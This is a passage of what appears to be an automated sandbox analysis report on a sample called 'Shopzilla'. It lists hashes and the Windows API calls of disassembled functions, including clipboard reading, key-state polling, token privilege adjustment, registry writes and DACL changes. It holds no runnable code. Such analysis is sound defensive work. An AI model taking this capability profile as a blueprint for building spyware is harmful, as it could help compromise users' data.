                                              • Opcode ID: 0615804a5b2035fb1ba3e79cae59ef73e39018628b00c49d2de19c0d60e6d9a2
                                              • Instruction ID: a77a49d05c3bae69a4f7f57e20af9f99b4da934475a3573a258fc4bd59125c7a
                                              • Opcode Fuzzy Hash: 0615804a5b2035fb1ba3e79cae59ef73e39018628b00c49d2de19c0d60e6d9a2
                                              • Instruction Fuzzy Hash: A4F08C362102048FCB10EF59D854B6EB7E8AF88320F048499F94A8B392CBB4BD41CB90
                                              APIs
                                                • Part of subcall function 00BA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BA29F3
                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C2CF5A
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C2CFB8
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00C2CFF9
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C2D023
                                              • SendMessageW.USER32 ref: 00C2D04C
                                              • _wcsncpy.LIBCMT ref: 00C2D0B8
                                              • GetKeyState.USER32(00000011), ref: 00C2D0D9
                                              • GetKeyState.USER32(00000009), ref: 00C2D0E6
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C2D0FC
                                              • GetKeyState.USER32(00000010), ref: 00C2D106
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C2D12F
                                              • SendMessageW.USER32 ref: 00C2D156
                                              • SendMessageW.USER32(?,00001030,?,00C2B735), ref: 00C2D25A
                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C2D270
                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C2D283
                                              • SetCapture.USER32(?), ref: 00C2D28C
                                              • ClientToScreen.USER32(?,?), ref: 00C2D2F1
                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C2D2FE
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C2D318
                                              • ReleaseCapture.USER32 ref: 00C2D323
                                              • GetCursorPos.USER32(?), ref: 00C2D35D
                                              • ScreenToClient.USER32(?,?), ref: 00C2D36A
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C2D3C6
                                              • SendMessageW.USER32 ref: 00C2D3F4
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C2D431
                                              • SendMessageW.USER32 ref: 00C2D460
                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C2D481
                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C2D490
                                              • GetCursorPos.USER32(?), ref: 00C2D4B0
                                              • ScreenToClient.USER32(?,?), ref: 00C2D4BD
                                              • GetParent.USER32(?), ref: 00C2D4DD
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C2D546
                                              • SendMessageW.USER32 ref: 00C2D577
                                              • ClientToScreen.USER32(?,?), ref: 00C2D5D5
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C2D605
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C2D62F
                                              • SendMessageW.USER32 ref: 00C2D652
                                              • ClientToScreen.USER32(?,?), ref: 00C2D6A4
                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C2D6D8
                                                • Part of subcall function 00BA29AB: GetWindowLongW.USER32(?,000000EB), ref: 00BA29BC
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00C2D774
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                              • String ID: @GUI_DRAGID$F
                                              • API String ID: 3977979337-4164748364
                                              • Opcode ID: e16876380dd3d7f2176501669f107403f656dce5cbcf98e4763f160a9d2f197f
                                              • Instruction ID: ab46089a1536e2892b67789588cc2516f9b457ea02f2cc4c0a24ae382440cdec
                                              • Opcode Fuzzy Hash: e16876380dd3d7f2176501669f107403f656dce5cbcf98e4763f160a9d2f197f
                                              • Instruction Fuzzy Hash: 4A42AF30104310AFDB20CF68D988BAEBBF5FF89750F144919FA6A876A1C771E954CB91
                                              APIs
                                                • Part of subcall function 00BF917C: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BF91C6
                                                • Part of subcall function 00BF917C: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BF91F3
                                                • Part of subcall function 00BF917C: GetLastError.KERNEL32 ref: 00BF9200
                                              • _memset.LIBCMT ref: 00BF8D54
                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00BF8DA6
                                              • CloseHandle.KERNEL32(?), ref: 00BF8DB7
                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00BF8DCE
                                              • GetProcessWindowStation.USER32 ref: 00BF8DE7
                                              • SetProcessWindowStation.USER32(00000000), ref: 00BF8DF1
                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00BF8E0B
                                                • Part of subcall function 00BF8BCC: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00BF8D0A), ref: 00BF8BE1
                                                • Part of subcall function 00BF8BCC: CloseHandle.KERNEL32(?,?,00BF8D0A), ref: 00BF8BF3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                              • String ID: $default$winsta0
                                              • API String ID: 2063423040-1027155976
                                              • Opcode ID: 5847a5b89f594789438993b123377ebf39ce94ed53acda45d0f743a720e7fd10
                                              • Instruction ID: 385177cd7e61986e9689b8b6519770ad67ea896b6388636e6f34200b1857cd4b
                                              • Opcode Fuzzy Hash: 5847a5b89f594789438993b123377ebf39ce94ed53acda45d0f743a720e7fd10
                                              • Instruction Fuzzy Hash: 8B8149B191020DAFDF119FA4CC85BFE7BB9EF04304F1445AAFA15A7161DB318E589B60
                                              APIs
                                              • OpenClipboard.USER32(00C30980), ref: 00C14440
                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00C1444E
                                              • GetClipboardData.USER32(0000000D), ref: 00C14456
                                              • CloseClipboard.USER32 ref: 00C14462
                                              • GlobalLock.KERNEL32(00000000), ref: 00C1447E
                                              • CloseClipboard.USER32 ref: 00C14488
                                              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00C1449D
                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00C144AA
                                              • GetClipboardData.USER32(00000001), ref: 00C144B2
                                              • GlobalLock.KERNEL32(00000000), ref: 00C144BF
                                              • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00C144F3
                                              • CloseClipboard.USER32 ref: 00C14603
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                              • String ID:
                                              • API String ID: 3222323430-0
                                              • Opcode ID: 460a052e22d87a129ea6516211595350ec61ea3ca545a47c5b55c8c99b7519fe
                                              • Instruction ID: 08548775f834025d398328f97ac6c4dad36c24b744b5b0f2008d4eb4410fd328
                                              • Opcode Fuzzy Hash: 460a052e22d87a129ea6516211595350ec61ea3ca545a47c5b55c8c99b7519fe
                                              • Instruction Fuzzy Hash: F351AF72204201AFD304EF64EC6AFBF77A8AF85B01F104529F956D21E1DB70DA45DB62
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00C0CC3D
                                              • FindClose.KERNEL32(00000000), ref: 00C0CC91
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C0CCB6
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C0CCCD
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C0CCF4
                                              • __swprintf.LIBCMT ref: 00C0CD40
                                              • __swprintf.LIBCMT ref: 00C0CD83
                                                • Part of subcall function 00BB1A36: _memmove.LIBCMT ref: 00BB1A77
                                              • __swprintf.LIBCMT ref: 00C0CDD7
                                                • Part of subcall function 00BC37FA: __woutput_l.LIBCMT ref: 00BC3853
                                              • __swprintf.LIBCMT ref: 00C0CE25
                                                • Part of subcall function 00BC37FA: __flsbuf.LIBCMT ref: 00BC3875
                                                • Part of subcall function 00BC37FA: __flsbuf.LIBCMT ref: 00BC388D
                                              • __swprintf.LIBCMT ref: 00C0CE74
                                              • __swprintf.LIBCMT ref: 00C0CEC3
                                              • __swprintf.LIBCMT ref: 00C0CF12
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                              • API String ID: 3953360268-2428617273
                                              • Opcode ID: 67d7153f49bbefc20d68e3fa85f4e884995b5cc76b41b21ae739d5712c2bd18d
                                              • Instruction ID: 8733b3e5aa18913d22b3a050a56ebe2d5dda0ed8750bbe4a24ca7d7ea7dc4901
                                              • Opcode Fuzzy Hash: 67d7153f49bbefc20d68e3fa85f4e884995b5cc76b41b21ae739d5712c2bd18d
                                              • Instruction Fuzzy Hash: CEA13DB1408304ABD710EFA4D896EAFB7ECEF95704F404969F595C6191EB70EE08CB62
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00C0F466
                                              • _wcscmp.LIBCMT ref: 00C0F47B
                                              • _wcscmp.LIBCMT ref: 00C0F492
                                              • GetFileAttributesW.KERNEL32(?), ref: 00C0F4A4
                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00C0F4BE
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00C0F4D6
                                              • FindClose.KERNEL32(00000000), ref: 00C0F4E1
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00C0F4FD
                                              • _wcscmp.LIBCMT ref: 00C0F524
                                              • _wcscmp.LIBCMT ref: 00C0F53B
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00C0F54D
                                              • SetCurrentDirectoryW.KERNEL32(00C598F8), ref: 00C0F56B
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C0F575
                                              • FindClose.KERNEL32(00000000), ref: 00C0F582
                                              • FindClose.KERNEL32(00000000), ref: 00C0F594
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                              • String ID: *.*
                                              • API String ID: 1803514871-438819550
                                              • Opcode ID: 666b2d9be373c403732af95a3a1c803f3bf238ff0a6d866fc8dc04385bfe8fff
                                              • Instruction ID: 4c3fb1c5331a3f89f88650402ff32f99907537c7809c95afd952e5e7d050dfd7
                                              • Opcode Fuzzy Hash: 666b2d9be373c403732af95a3a1c803f3bf238ff0a6d866fc8dc04385bfe8fff
                                              • Instruction Fuzzy Hash: 5431A2326002196BDB20DFA5DC59BDE77ACAF09321F1041B9F825E31D0EB35DA85CB64
                                              APIs
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C20D7B
                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00C30980,00000000,?,00000000,?,?), ref: 00C20DE9
                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00C20E31
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00C20EBA
                                              • RegCloseKey.ADVAPI32(?), ref: 00C211DA
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00C211E7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Close$ConnectCreateRegistryValue
                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                              • API String ID: 536824911-966354055
                                              • Opcode ID: e611390d0065cc98a7551d0e30940325d9ecfd7935d34e539e29036a9fabce45
                                              • Instruction ID: de3f22ceb7c3618ce6f8c935f3d798f81360d11051fb70fdb5a920bfb923070a
                                              • Opcode Fuzzy Hash: e611390d0065cc98a7551d0e30940325d9ecfd7935d34e539e29036a9fabce45
                                              • Instruction Fuzzy Hash: 37028A752046119FCB14EF25D851E2AB7E4FF89710F0489ADF89A9B7A2CB70ED41CB81
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00C0F5C3
                                              • _wcscmp.LIBCMT ref: 00C0F5D8
                                              • _wcscmp.LIBCMT ref: 00C0F5EF
                                                • Part of subcall function 00C046E2: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C046FD
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00C0F61E
                                              • FindClose.KERNEL32(00000000), ref: 00C0F629
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00C0F645
                                              • _wcscmp.LIBCMT ref: 00C0F66C
                                              • _wcscmp.LIBCMT ref: 00C0F683
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00C0F695
                                              • SetCurrentDirectoryW.KERNEL32(00C598F8), ref: 00C0F6B3
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C0F6BD
                                              • FindClose.KERNEL32(00000000), ref: 00C0F6CA
                                              • FindClose.KERNEL32(00000000), ref: 00C0F6DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                              • String ID: *.*
                                              • API String ID: 1824444939-438819550
                                              • Opcode ID: e3be853372f26cafddb7eca66676efd93edbd4deb952a26131d547bdbf46db8d
                                              • Instruction ID: d23a26cd8d3c6e0351ee9d368cb35d50915f7e9e28d9a5a7920b810d54d64776
                                              • Opcode Fuzzy Hash: e3be853372f26cafddb7eca66676efd93edbd4deb952a26131d547bdbf46db8d
                                              • Instruction Fuzzy Hash: 8131C5325002196BDB209FA4DC59BDE77AC9F45324F2401B9F825A35E0DB328EC6CB64
                                              APIs
                                              • GetLocalTime.KERNEL32(?), ref: 00C0E18C
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C0E19C
                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C0E1A8
                                              • __wsplitpath.LIBCMT ref: 00C0E206
                                              • _wcscat.LIBCMT ref: 00C0E21E
                                              • _wcscat.LIBCMT ref: 00C0E230
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C0E245
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00C0E259
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00C0E28B
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00C0E2AC
                                              • _wcscpy.LIBCMT ref: 00C0E2B8
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C0E2F7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                              • String ID: *.*
                                              • API String ID: 3566783562-438819550
                                              • Opcode ID: aeb28792b9c3202271b6ba3b93461fe4391b856e73df0a889f54277d232053e7
                                              • Instruction ID: f732e49d2151a6eed8b45d5894ad5d71db4f3eb8e0b7b86561e30e2b62d61e30
                                              • Opcode Fuzzy Hash: aeb28792b9c3202271b6ba3b93461fe4391b856e73df0a889f54277d232053e7
                                              • Instruction Fuzzy Hash: 5E615B725083059FC710EF64C885A9FB3E8FF89310F04896EF99997291DB31EA45CB92
                                              APIs
                                                • Part of subcall function 00BF8C03: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BF8C1F
                                                • Part of subcall function 00BF8C03: GetLastError.KERNEL32(?,00BF86E3,?,?,?), ref: 00BF8C29
                                                • Part of subcall function 00BF8C03: GetProcessHeap.KERNEL32(00000008,?,?,00BF86E3,?,?,?), ref: 00BF8C38
                                                • Part of subcall function 00BF8C03: HeapAlloc.KERNEL32(00000000,?,00BF86E3,?,?,?), ref: 00BF8C3F
                                                • Part of subcall function 00BF8C03: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BF8C56
                                                • Part of subcall function 00BF8CA0: GetProcessHeap.KERNEL32(00000008,00BF86F9,00000000,00000000,?,00BF86F9,?), ref: 00BF8CAC
                                                • Part of subcall function 00BF8CA0: HeapAlloc.KERNEL32(00000000,?,00BF86F9,?), ref: 00BF8CB3
                                                • Part of subcall function 00BF8CA0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00BF86F9,?), ref: 00BF8CC4
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00BF8714
                                              • _memset.LIBCMT ref: 00BF8729
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00BF8748
                                              • GetLengthSid.ADVAPI32(?), ref: 00BF8759
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00BF8796
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00BF87B2
                                              • GetLengthSid.ADVAPI32(?), ref: 00BF87CF
                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00BF87DE
                                              • HeapAlloc.KERNEL32(00000000), ref: 00BF87E5
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00BF8806
                                              • CopySid.ADVAPI32(00000000), ref: 00BF880D
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00BF883E
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00BF8864
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00BF8878
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                              • String ID:
                                              • API String ID: 3996160137-0
                                              • Opcode ID: 8c5e296a5ac4d2b71526ba68378205351d4e011c302086a30f38fae9cd3b6732
                                              • Instruction ID: fd859e8d14ebd27cebaec05ce8f3d371d035c3ac82cb8a1c87c56f38a8351b47
                                              • Opcode Fuzzy Hash: 8c5e296a5ac4d2b71526ba68378205351d4e011c302086a30f38fae9cd3b6732
                                              • Instruction Fuzzy Hash: D6613872910209AFDF04DFA4DC54BBEBBB9FF04744F1481A9EA15A7290DB319A08CB60
                                              APIs
                                                • Part of subcall function 00C21242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C201D5,?,?), ref: 00C21259
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C208D4
                                                • Part of subcall function 00BA4D37: __itow.LIBCMT ref: 00BA4D62
                                                • Part of subcall function 00BA4D37: __swprintf.LIBCMT ref: 00BA4DAC
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C20973
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C20A0B
                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00C20C4A
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00C20C57
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                              • String ID:
                                              • API String ID: 1240663315-0
                                              • Opcode ID: 36c0b42c5ea2b166436f8e382a79c699570e8e82b8e516617c188a763cc31a96
                                              • Instruction ID: a19a53d7ec069d69564778c2dc62274ed6eeb9b412a9bdf816830330af7f91f9
                                              • Opcode Fuzzy Hash: 36c0b42c5ea2b166436f8e382a79c699570e8e82b8e516617c188a763cc31a96
                                              • Instruction Fuzzy Hash: 12E16D71204214AFC714DF29D895E6EBBE8EF89314F14896DF85ADB2A2DB30ED01CB51
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 00C0039C
                                              • GetAsyncKeyState.USER32(000000A0), ref: 00C0041D
                                              • GetKeyState.USER32(000000A0), ref: 00C00438
                                              • GetAsyncKeyState.USER32(000000A1), ref: 00C00452
                                              • GetKeyState.USER32(000000A1), ref: 00C00467
                                              • GetAsyncKeyState.USER32(00000011), ref: 00C0047F
                                              • GetKeyState.USER32(00000011), ref: 00C00491
                                              • GetAsyncKeyState.USER32(00000012), ref: 00C004A9
                                              • GetKeyState.USER32(00000012), ref: 00C004BB
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00C004D3
                                              • GetKeyState.USER32(0000005B), ref: 00C004E5
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              • Opcode ID: 8877e881ad32e1b22d19a6880a2c4232eec2011fa5bdc42c157e1b43f79f101e
                                              • Instruction ID: 40efd7bfead9263b0b5fbb4eeb730ff9000928f6649555393182b873b0e38f03
